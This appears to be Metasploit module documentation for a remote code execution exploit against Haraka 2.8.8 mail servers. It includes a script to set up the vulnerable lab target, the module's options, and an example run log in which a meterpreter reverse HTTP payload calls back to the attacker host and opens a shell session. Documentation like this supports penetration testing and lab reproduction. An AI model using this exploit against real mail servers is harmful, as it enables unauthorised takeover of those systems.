Vulnerable Application
Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar:
#install nodejs and npm
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
sudo apt install nodejs
#Haraka setup
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
tar xvzf v2.8.8.tar.gz
cd Haraka-2.8.8/
npm install npm
npm install
haraka -i haraka
cat << EOF > haraka/config/plugins
access
rcpt_to.in_host_list
data.headers
attachment
test_queue
max_unrecognized_commands
EOF
echo haraka.test >> haraka/config/host_list
# Launch haraka as root
sudo haraka -c haraka
Options
from_email
String used in the SMTP MAILFROM command
to_email
String used in the SMTP MAILTO command
lhost
The address to serve the payload from
rhost
The address or hostname to target
payload
Any compatible Metasploit payload
Example Run
msf > use exploit/linux/smtp/haraka
msf exploit(haraka) > set email_to root@haraka.test
email_to => root@haraka.test
msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http
payload => linux/x64/meterpreter_reverse_http
msf exploit(haraka) > run
[*] Started HTTP reverse handler on http://192.168.1.1:8080
[*] Exploiting...
[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3
[*] Sending mail to target server...
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit
msf exploit(haraka) >
